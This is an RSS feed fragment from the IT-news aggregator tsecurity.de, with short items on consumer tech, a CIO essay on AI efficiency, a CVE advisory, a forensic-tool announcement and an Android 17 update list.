<link>https://tsecurity.de/de/3629059/it-nachrichten/hisense-is-giving-parents-a-magic-tv-remote-that-stops-kids-from-seeing-inappropriate-content-and-i-wish-it-had-been-around-when-my-two-were-tots/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629059/it-nachrichten/hisense-is-giving-parents-a-magic-tv-remote-that-stops-kids-from-seeing-inappropriate-content-and-i-wish-it-had-been-around-when-my-two-were-tots/</guid>
<pubDate>Sat, 27 Jun 2026 08:01:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hisense's new Safe Streaming remote connects directly to the kid-safe VIDAA Kids, powered by Kidoodle.tv.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI efficiency beyond the model: Rethinking code, hardware and cloud]]></title>
<description><![CDATA[As AI adoption grows, I see fellow enterprise leaders realizing that just implementing AI is not enough. We need to develop and adopt the best, fastest and most efficient AI models. It’s not just a matter of pride about who has the shiniest toy; optimizing models for efficiency can be the differe...]]></description>
<link>https://tsecurity.de/de/3624204/it-security-nachrichten/ai-efficiency-beyond-the-model-rethinking-code-hardware-and-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624204/it-security-nachrichten/ai-efficiency-beyond-the-model-rethinking-code-hardware-and-cloud/</guid>
<pubDate>Thu, 25 Jun 2026 13:08:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As AI adoption grows, I see fellow enterprise leaders realizing that just implementing AI is not enough. We need to develop and adopt the best, fastest and most efficient AI models. It’s not just a matter of pride about who has the shiniest toy; <a href="https://www.cio.com/article/4109911/cognitive-data-architecture-designing-self-optimizing-frameworks-for-scalable-ai-systems.html">optimizing models</a> for efficiency can be the difference between a failed pilot and an effective business strategy.</p>



<p>At the most extreme end of the spectrum, inefficient use of AI can cost billions of dollars. Sam Altman, CEO of OpenAI, made headlines when he <a href="https://x.com/sama/status/1912646035979239430" rel="nofollow">admitted on X</a> that his company loses tens of millions of dollars every time people say “please” and “thank you” to his AI models, even though he added that he feels it’s money well spent.</p>



<p>Model efficiency also matters for those of us not operating at OpenAI’s scale. A more efficient model helps reduce overall costs because it doesn’t require as powerful or expensive hardware, uses less electricity, delivers output faster and can operate with a smaller cloud footprint.</p>



<p>Models that are optimized for efficiency deliver lower latency, improved scalability, increased flexibility and are less likely to drift. In my experience, all of this adds up to higher profit margins, a sharper competitive edge and a faster time to market, which are crucial whether you’re planning to use your model internally or sell it to others.</p>



<h2 class="wp-block-heading">The new CIO investment dilemma</h2>



<p>For a long time, it was believed that hardware must continually increase in power to enable models to grow in size. Then DeepSeek v2 came along and demolished all those theories. It showed that more efficient hardware can deliver equivalent results with less compute power by running smaller, smarter models.</p>



<p>Now, those of us in the CIO seat face a new dilemma: should we increase investment in computing power, focus on hardware or concentrate on software?</p>



<p>In my view, the correct answer is: all the above. AI efficiency is a full-stack problem. Hardware, compilers, runtime and model architecture must be co-designed to work in harmony; otherwise, we’re wasting money and failing to achieve the results we need. Today, choosing GPUs vs. custom accelerators vs. CPUs affects which model optimizations are viable.</p>



<h2 class="wp-block-heading">Hardware power constraints model capabilities</h2>



<p>It remains true that even the most powerful model in the world can’t function without access to the necessary hardware. Hardware performance is ultimately bounded by memory bandwidth, interconnect speed and compute units, no matter how optimized our models are.</p>



<p>This means that scalability depends on interconnects. Multi-node training and large inference clusters hinge on the performance of NVLink, InfiniBand or Ethernet fabric, not just model quality, so decisions about hardware investments or cloud providers can be critical to overall functionality.</p>



<p>“The pace of innovation is directly tied to advances in GPUs, tensor processing units (TPUs) and custom accelerators. The real question isn’t just what models we can build, but whether we have the compute infrastructure to support them,” says Gaurav Dewan, a research director at Avasant. “Models can only grow as powerful as the chips, memory systems and data center networks sustaining them.”</p>



<h2 class="wp-block-heading"><a></a>Compute power isn’t everything</h2>



<p>That said, in my experience, you can’t just throw computing power at every problem. Choices about hardware and cloud architecture determine how effectively users can tap into the potential of compute resources. Modern AI workloads are often memory-bound rather than compute-bound, so faster HBM, cache hierarchies and interconnects directly lower latency.</p>



<p>What’s more, the energy for computing power is limited. Companies can’t always afford the compute power they want, <a href="https://www.cloudzero.com/state-of-ai-costs/" rel="nofollow">with 58% saying</a> their AI cloud costs are too high. Cost per inference is hardware-driven and compute is usually the biggest line item in AI TCO. It’s not even easy to find space for enough GPUs, creating board-level power and cooling constraints in enterprise AI. More efficient silicon reduces data center strain, sustainability risk and cost per token/inference.</p>



<p>Additionally, reliability and utilization affect ROI. Features like MIG partitioning, hardware scheduling and fault tolerance determine how fully we can monetize expensive accelerators. Performance per watt is now the bottom line, with CIOs like me striving to get more out of every existing GPU per watt, dollar and square meter. We need to make our hardware more efficient by fine-tuning models and software to maximize capability.</p>



<p>“DeepSeek’s breakthrough suggests that AI models no longer need to scale indefinitely in size and complexity to achieve superior performance. Instead, they can be algorithmically optimized to deliver the same, if not better, results while consuming significantly fewer resources,” explains Matthew Taylor <a href="https://www.linkedin.com/pulse/ai-infrastructure-dilemma-on-premises-vs-cloud-2025-dr-matthew--zed1e/" rel="nofollow">in his post</a> on LinkedIn.</p>



<h2 class="wp-block-heading">Rethinking cloud strategy in the age of AI</h2>



<p>That cost pressure has forced many of us to revisit assumptions we held for the better part of a decade. Cloud computing has reached an uncertain crossroads. The hyperscaler-by-default posture that defined the last era of enterprise IT no longer survives a serious look at AI economics.</p>



<p>When inference costs scale linearly with usage and training runs can consume an annual infrastructure budget in weeks, the question I hear in every CIO conversation is the same: does our cloud strategy still match the workload we are actually running?</p>



<p>In my experience, the answer is increasingly no, at least not without significant rebalancing. Private clouds, written off as legacy not long ago, are quietly making a comeback. The combination of predictable cost structures, tighter control over data residency and the sensitivity of the proprietary data feeding our AI systems is making on-premise and colocation options compelling again, particularly for regulated industries.</p>



<p>At the same time, purpose-built neoclouds for GPU workloads, along with sovereign clouds responding to jurisdictional and data-protection mandates, are steadily chipping away at the dominance of AWS, Azure and GCP. None of these alternatives replace the hyperscalers outright, but they are forcing every CIO I know to think about cloud as a portfolio rather than a single vendor relationship.</p>



<p>What I have found is that navigating this shift takes more than a procurement decision. It takes a clear-eyed view of where each workload genuinely belongs. Training, inference, retrieval, fine-tuning and experimentation each carry different cost curves, latency profiles and data-gravity considerations. As organizations move <a href="https://www.artefact.com/blog/data-platforms-for-the-agentic-era/" rel="nofollow">towards the agentic</a> AI era, the underlying data platform becomes equally important, requiring architectures that can support multimodal data, real-time processing and governance at scale.</p>



<p>The enterprises I have seen handle this best treat cloud strategy as an ongoing exercise in workload placement, not a one-time platform commitment.</p>



<p>That is also where the conversation tends to outgrow internal teams.</p>



<p>As AI moves from pilots to production, the questions get harder: how to architect data foundations that survive model churn, how to govern AI without strangling it, how to translate technical efficiency into measurable business value. I have seen organizations lean on specialist partners to think through these problems alongside them. Among the consultancies working at this intersection is Artefact, founded in Paris and operating across data strategy, AI engineering and enterprise transformation. Its work includes governance, platform development, operating models and workforce enablement—areas that have become increasingly important as organizations move from AI pilots to large-scale deployment.</p>



<p>What I find useful about these consultancies is not the technology recommendations themselves; it is the pattern recognition they bring from seeing similar cloud and AI transitions play out across geographies and sectors. In a moment when every CIO is rewriting the playbook simultaneously, that outside vantage point matters more than it used to.</p>



<h2 class="wp-block-heading">Hardware is often underused and misused</h2>



<p><a></a>A lot of hardware goes unused or underutilized. Often, GPUs sit idle due to deployment complexity and data infrastructure bottlenecks, so enterprises don’t see the value of the compute power they’re paying for. When data and computing are on two separate chips, compute is wasted moving data between the two locations.</p>



<p>Likewise, models that exceed accelerator memory or require excessive HBM traffic suffer steep latency and cost penalties. Optimizing models to align with hardware means that all the compute power is being put to good use.</p>



<p>Techniques like operator fusion, activation management, fine-tuning smaller models, pruning unnecessary parameters and memory-aware architectures keep more of the model resident on the accelerator, reduce unnecessary read/write cycles and combine steps so data is touched fewer times.</p>



<p>Kfir Aberman, founding member at Decart AI, <a href="https://www.techzine.eu/experts/analytics/136536/how-our-team-optimizes-infrastructure-for-minimal-ai-video-processing-latency/">explains this approach</a>. “Our solution to this was to optimize our kernels for how [Nvidia GPU] Hopper works. Essentially, we created a single ‘mega kernel’ that enables the chip to process all of a model’s computations in a single, continuous pass. By doing this, we eliminate all of the stopping, starting and data movement, allowing more of the GPU to be utilized more of the time, speeding up processing by an order of magnitude.”</p>



<p>When models match accelerator characteristics such as tensor core shapes, SIMD widths and kernel libraries, this keeps expensive silicon working effectively and translates theoretical FLOPs into real throughput.</p>



<h2 class="wp-block-heading">More hardware can’t overcome model mismatch</h2>



<p><a></a>Another way that organizations undermine ROI on their own AI investments is by ignoring coordination efficiency.</p>



<p>They’ll buy large GPU clusters but pay little attention to what seem like minor issues with batching and alignment. Unfortunately, when batch sizes are wrong, work is split inefficiently and network links become bottlenecks, you see expensive but underutilized clusters.</p>



<p>Ultimately, more GPUs don’t guarantee more performance. Parallelism and batching must match the system topology. Effective scaling depends on aligning data, tensor and pipeline parallelism and batch sizing with the actual interconnect bandwidth and node configuration.</p>



<h2 class="wp-block-heading">The magic happens when model and hardware come together</h2>



<p>The lesson that those of us in CIO roles are learning is that symbiosis between model and hardware is critical. Code determines what our AI can do, hardware determines how efficiently we can afford to do it and co-design determines whether our AI program scales economically and successfully.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pixel-Smartphones: Screenshots werden jetzt auch in die Cloud gesendet – magische Analyse nicht nur lokal]]></title>
<description><![CDATA[Schon vor mittlerweile eineinhalb Jahren wurde die Android-App Pixel Screenshots gestartet, die den Nutzern magische Funktionen zur Auswertung ihrer Bildschirmfotos bieten soll. Die darin enthaltenen Informationen sollten vollständig lokal ausgelesen und für die Gemini-KI verwendet werden - doch ...]]></description>
<link>https://tsecurity.de/de/3624176/it-nachrichten/pixel-smartphones-screenshots-werden-jetzt-auch-in-die-cloud-gesendet-magische-analyse-nicht-nur-lokal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624176/it-nachrichten/pixel-smartphones-screenshots-werden-jetzt-auch-in-die-cloud-gesendet-magische-analyse-nicht-nur-lokal/</guid>
<pubDate>Thu, 25 Jun 2026 13:02:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="363" src="https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-1024x580.jpg" class="attachment-large size-large wp-post-image" alt="pixel 9 magic" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-1024x580.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-300x170.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-768x435.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-640x362.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-800x453.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Schon vor mittlerweile eineinhalb Jahren wurde die Android-App <a href="https://www.googlewatchblog.de/2025/03/pixel-screenshots-feature-drop-sorgt-fuer-ordnung-neue-bildschirmfotos-in-sammlungen-integrieren/"><strong>Pixel Screenshots</strong></a> gestartet, die den Nutzern magische Funktionen zur Auswertung ihrer Bildschirmfotos bieten soll. Die darin enthaltenen Informationen sollten vollständig lokal ausgelesen und für die Gemini-KI verwendet werden - doch das ändert sich jetzt. Im jüngsten Update der App ist von einer rein lokalen Analyse keine Rede mehr.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/06/pixel-smartphones-screenshots-werden-jetzt-auch-in-die-cloud-gesendet-magische-analyse-nicht-nur-lokal-u/">Pixel-Smartphones: Screenshots werden jetzt auch in die Cloud gesendet – magische Analyse nicht nur lokal</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/6308ebaa17744082ae9e83eadd544003"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/6308ebaa17744082ae9e83eadd544003" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/06/pixel-smartphones-screenshots-werden-jetzt-auch-in-die-cloud-gesendet-magische-analyse-nicht-nur-lokal-u/">Pixel-Smartphones: Screenshots werden jetzt auch in die Cloud gesendet – magische Analyse nicht nur lokal</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-39002 | Huawei EMUI/Magic UI Storage double free (EUVD-2022-41548)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Huawei EMUI and Magic UI. Impacted is an unknown function of the component Storage Module. Executing a manipulation can lead to double free.

This vulnerability is tracked as CVE-2022-39002. The attack is only possible within the loca...]]></description>
<link>https://tsecurity.de/de/3623508/sicherheitsluecken/cve-2022-39002-huawei-emuimagic-ui-storage-double-free-euvd-2022-41548/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623508/sicherheitsluecken/cve-2022-39002-huawei-emuimagic-ui-storage-double-free-euvd-2022-41548/</guid>
<pubDate>Thu, 25 Jun 2026 08:09:34 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/huawei:emui">Huawei EMUI and Magic UI</a>. Impacted is an unknown function of the component <em>Storage Module</em>. Executing a manipulation can lead to double free.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2022-39002">CVE-2022-39002</a>. The attack is only possible within the local network. No exploit exists.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Realistic-Linux-Game]]></title>
<description><![CDATA[I'm working on a concept for a narrative Linux game where players learn real Linux skills by solving problems, investigating incidents, and interacting with realistic systems. The goal is not to create another Hollywood-style hacking game where everything is solved with a single button press. Ins...]]></description>
<link>https://tsecurity.de/de/3623060/linux-tipps/realistic-linux-game/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623060/linux-tipps/realistic-linux-game/</guid>
<pubDate>Thu, 25 Jun 2026 01:24:20 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I'm working on a concept for a narrative Linux game where players learn real Linux skills by solving problems, investigating incidents, and interacting with realistic systems.</p> <p>The goal is not to create another Hollywood-style hacking game where everything is solved with a single button press.</p> <p>Instead, the game would focus on things Linux users actually encounter:</p> <ul> <li>navigating file systems</li> <li>reading logs</li> <li>managing services</li> <li>troubleshooting network issues</li> <li>working with permissions</li> <li>SSH access to remote systems</li> <li>containers and automation</li> <li>investigating strange system behavior</li> </ul> <p>One of the main design goals is accessibility.</p> <p>The game is not intended only for Linux professionals. Complete beginners should be able to start with zero Linux experience and gradually learn real concepts through gameplay, documentation, and exploration.</p> <p>Experienced users should recognize authentic tools, workflows, and problems.</p> <p>Beginners should finish the game feeling comfortable opening a Linux terminal in real life.</p> <p>The idea is simple:</p> <p>Learn Linux.<br> Solve problems.<br> Uncover a mystery.</p> <p>What would you absolutely want to see in a game like this?</p> <p>And what would immediately break immersion for you?</p> <p>PS.: One more thing we want to clarify: the game will be made in a 2D / 2.5D style. The reason is simple: we are only two solo developers working on this project in our free time. A full 3D game would require much more time, experience, and resources than we currently have. But we still want to create something memorable — with a strong story, variety, atmosphere, interesting camera work, and unique mechanics.</p> <p>We also decided to add an engineering element to the game. After the first test version / demo, we plan to introduce a Raspberry Pi-related part: assembling it, configuring it, and using it in a way that becomes important for the main character and the story.</p> <p>But we want to make one thing clear: we are not going to move away from realism. There will be no “magic hacking”, no overpowered superhero, and no unrealistic power fantasy. We want the main character to feel like an ordinary person — someone real, limited, and human — who has to solve problems with knowledge, patience, and practical skills.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Glass-Bat7863"> /u/Glass-Bat7863 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1ue7mtb/realisticlinuxgame/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ue7mtb/realisticlinuxgame/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Magic: The Gathering – Arena’ development team announces it’s successfully unionized]]></title>
<description><![CDATA[The developers for a video game based on Magic: The Gathering announced on Tuesday that they’ve successfully unionized, following a petition filed with the US National Labor Relations Board. Read More]]></description>
<link>https://tsecurity.de/de/3623013/it-nachrichten/magic-the-gathering-arena-development-team-announces-its-successfully-unionized/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623013/it-nachrichten/magic-the-gathering-arena-development-team-announces-its-successfully-unionized/</guid>
<pubDate>Thu, 25 Jun 2026 01:03:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1260" height="709" src="https://cdn.geekwire.com/wp-content/uploads/2018/12/Image4_Selesnya-1260x709.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="magic: the gathering arena wizards of the coast" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2018/12/Image4_Selesnya-1260x709.jpg 1260w, https://cdn.geekwire.com/wp-content/uploads/2018/12/Image4_Selesnya-768x432.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2018/12/Image4_Selesnya-630x354.jpg 630w, https://cdn.geekwire.com/wp-content/uploads/2018/12/Image4_Selesnya.jpg 1920w" sizes="(max-width: 1260px) 100vw, 1260px"><br>The developers for a video game based on Magic: The Gathering announced on Tuesday that they’ve successfully unionized, following a petition filed with the US National Labor Relations Board. <a href="https://www.geekwire.com/2026/magic-the-gathering-arena-development-team-announces-its-successfully-unionized/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ultrafast Lasers 101: A Photonic Adventure for Molecular Dynamics Enthusiasts (gpn24)]]></title>
<description><![CDATA[I'll cover the fundamentals of laser operation, including gain, population inversion and how you convince a bunch of excited atoms to all emit light in sync instead of doing their own thing.
We then explore how femtosecond pulses are produced in practice.
I'll explain some simple methods for shap...]]></description>
<link>https://tsecurity.de/de/3622526/it-security-video/ultrafast-lasers-101-a-photonic-adventure-for-molecular-dynamics-enthusiasts-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622526/it-security-video/ultrafast-lasers-101-a-photonic-adventure-for-molecular-dynamics-enthusiasts-gpn24/</guid>
<pubDate>Wed, 24 Jun 2026 20:49:37 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I'll cover the fundamentals of laser operation, including gain, population inversion and how you convince a bunch of excited atoms to all emit light in sync instead of doing their own thing.
We then explore how femtosecond pulses are produced in practice.
I'll explain some simple methods for shaping, tweaking, and measuring those pulses.
As a practical example, I will walk you through the velocity map imaging (VMI) setup I work with to show what can be done with this equipment, watching molecules fall apart, like a molecular stroboscope.

I work in a research group¹ doing &quot;Ultrafast Dynamics inside He Nanodroplets&quot;.
I'd like to share some of the fascinating concepts, from my perspective doing real time data analysis for the research group.
„In order to measure an event in time, you must use a shorter one...“ ~ Rick Trebino
This is why we are interested in pulses of that regime, molecular dynamics operate exactly at that timescale.
But when one works with such short pulses, not only aligning the setup becomes a real pain, but also non-linear effects take over in ways you wouldn't expect from a classic optics viewpoint. Comparable to RF magic in electronics, you wouldn't expect when you look at low frequencies.
The goal is to develop an intuitive understanding of how the knowledge fits together and what those techniques enable us to observe.
I will not go deep into the details, because this topic is extremely complex and even the master's course at my university about &quot;Ultrafast laser physics&quot; is an overview of the topic. So this is going to be &quot;an overview of an overview&quot;, a 101.

[1] Femtosecond Dynamics, TU Graz ( https://www.tugraz.at/en/institutes/iep/research/femtosecond-dynamics )

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/JL7QUB/]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Duck Lands Leader Spot in Gartner’s Brand-New Software Supply Chain Security Magic Quadrant]]></title>
<description><![CDATA[Application security firm Black Duck has been named a Leader in Gartner’s first-ever Magic Quadrant for Software Supply Chain Security, the company announced today. The inaugural report assessed 18 vendors against two axes, Completeness of Vision and Ability to Execute, and placed Black Duck firm...]]></description>
<link>https://tsecurity.de/de/3621941/it-security-nachrichten/black-duck-lands-leader-spot-in-gartners-brand-new-software-supply-chain-security-magic-quadrant/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621941/it-security-nachrichten/black-duck-lands-leader-spot-in-gartners-brand-new-software-supply-chain-security-magic-quadrant/</guid>
<pubDate>Wed, 24 Jun 2026 17:39:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Application security firm Black Duck has been named a Leader in Gartner’s first-ever Magic Quadrant for Software Supply Chain Security, the company announced today. The inaugural report assessed 18 vendors against two axes, Completeness of Vision and Ability to Execute, and placed Black Duck firmly in the Leaders quadrant. The timing of the report reflects […]</p>
<p>The post <a href="https://www.itsecurityguru.org/2026/06/22/black-duck-lands-leader-spot-in-gartners-brand-new-software-supply-chain-security-magic-quadrant/">Black Duck Lands Leader Spot in Gartner’s Brand-New Software Supply Chain Security Magic Quadrant</a> appeared first on <a href="https://www.itsecurityguru.org/">IT Security Guru</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Magic Mushrooms gegen Alzheimer? In einer Einzelfallstudie besserten sich manche Symptome]]></title>
<description><![CDATA[Nur eine Dosis Psilocybin – und eine Frau mit schwerem Alzheimer kann wieder sprechen. Auch andere Symptome bessern sich. Wie aussagekräftig sind die Ergebnisse einer Aufsehen erregenden Fallstudie aus Brasilien?
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3620559/it-nachrichten/magic-mushrooms-gegen-alzheimer-in-einer-einzelfallstudie-besserten-sich-manche-symptome/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620559/it-nachrichten/magic-mushrooms-gegen-alzheimer-in-einer-einzelfallstudie-besserten-sich-manche-symptome/</guid>
<pubDate>Wed, 24 Jun 2026 09:47:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nur eine Dosis Psilocybin – und eine Frau mit schwerem Alzheimer kann wieder sprechen. Auch andere Symptome bessern sich. Wie aussagekräftig sind die Ergebnisse einer Aufsehen erregenden Fallstudie aus Brasilien?
<a href="https://t3n.de/news/magic-mushrooms-gegen-alzheimer-symptome-verbessern-psychedelika-1748978/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bypassing Stolen Device Protection: Alternative Ways of Installing the Extraction Agent]]></title>
<description><![CDATA[Stated plainly: iOS Forensic Toolkit can now get past Stolen Device Protection. There is a catch, and it belongs up front: this is not a magic unlock, and anyone selling it as one is selling something. What we have built is a way to install the extraction agent without ever pairing the iPhone to ...]]></description>
<link>https://tsecurity.de/de/3620459/it-security-tools/bypassing-stolen-device-protection-alternative-ways-of-installing-the-extraction-agent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620459/it-security-tools/bypassing-stolen-device-protection-alternative-ways-of-installing-the-extraction-agent/</guid>
<pubDate>Wed, 24 Jun 2026 09:05:18 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img src="https://blog.elcomsoft.com/wp-content/uploads/2026/06/EIFT-10.1-new-4_1200x630.png" width="1200" height="630" title="" alt=""></div><div>Stated plainly: iOS Forensic Toolkit can now get past Stolen Device Protection. There is a catch, and it belongs up front: this is not a magic unlock, and anyone selling it as one is selling something. What we have built is a way to install the extraction agent without ever pairing the iPhone to the […]</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android 17: Diese Smartphones bekommen das Update nicht mehr]]></title>
<description><![CDATA[Das nächste große Systemupdate Android 17 wurde mit Spannung erwartet, und jetzt ist es endlich erschienen. Die ersten Nutzer können die finale Version jetzt auf ihrem Gerät installieren. Doch nicht jedes Smartphone bekommt die neueste Version von Googles Betriebssystem.



Während neue Modelle o...]]></description>
<link>https://tsecurity.de/de/3620388/it-nachrichten/android-17-diese-smartphones-bekommen-das-update-nicht-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620388/it-nachrichten/android-17-diese-smartphones-bekommen-das-update-nicht-mehr/</guid>
<pubDate>Wed, 24 Jun 2026 08:32:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Das nächste große Systemupdate <a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank" rel="noreferrer noopener">Android 17</a> wurde mit Spannung erwartet, und jetzt ist es <a href="https://www.pcwelt.de/article/3167761/android-17-endlich-da-so-bekommen-sie-jetzt-das-update.html" target="_blank" rel="noreferrer noopener">endlich erschienen</a>. Die ersten Nutzer können die finale Version jetzt auf ihrem Gerät installieren. Doch nicht jedes Smartphone bekommt die neueste Version von Googles Betriebssystem.</p>



<p>Während neue Modelle oft fünf bis sieben Jahre versorgt werden, fallen ältere Geräte 2026 aus dem Update-Zyklus heraus. Umso wichtiger also, zu überprüfen, ob das eigene Gerät noch Android 17 bekommt oder doch leer ausgeht. Dafür haben wir diese Liste der wichtigsten Hersteller zusammengestellt (ohne Anspruch auf Vollständigkeit, denn es gibt sehr viele!).</p>



<p><strong>Wichtig: </strong>Viele Hersteller haben noch keine finalen Android-17-Roadmaps veröffentlicht. Die folgende Übersicht basiert auf offiziellen Update-Versprechen, bekannten Support-Zeiträumen und aktuellen Android-17-Prognosen. Für einen Überblick aller Geräte, die Android 17 bekommen,<a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-handys-bekommen-update-herstelleruebersicht-mobilgeraete.html" target="_blank" rel="noreferrer noopener"> schauen Sie am besten hier vorbei.</a></p>



<h2 class="wp-block-heading">Google Pixel</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3b79e7f209d"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Google-Pixel-10a-vs-Pixel-10.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 10a vs Pixel 10" class="wp-image-3103476" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Martin / Foundy</p></div>



<p>Besitzer eines Google Pixel 6, 6 Pro oder 6a können aufatmen, denn Google hat hier den Support verlängert. Sie bekommen Android 17 also doch noch. Diese Pixel-Modelle erhalten aber voraussichtlich kein Android 17 mehr:</p>



<ul class="wp-block-list">
<li><strong>Pixel 5a</strong></li>



<li><strong>Pixel 5</strong></li>



<li><strong>Pixel 4a 5G</strong></li>



<li><strong>Pixel 4a</strong></li>



<li>ältere Pixel-Modelle</li>
</ul>



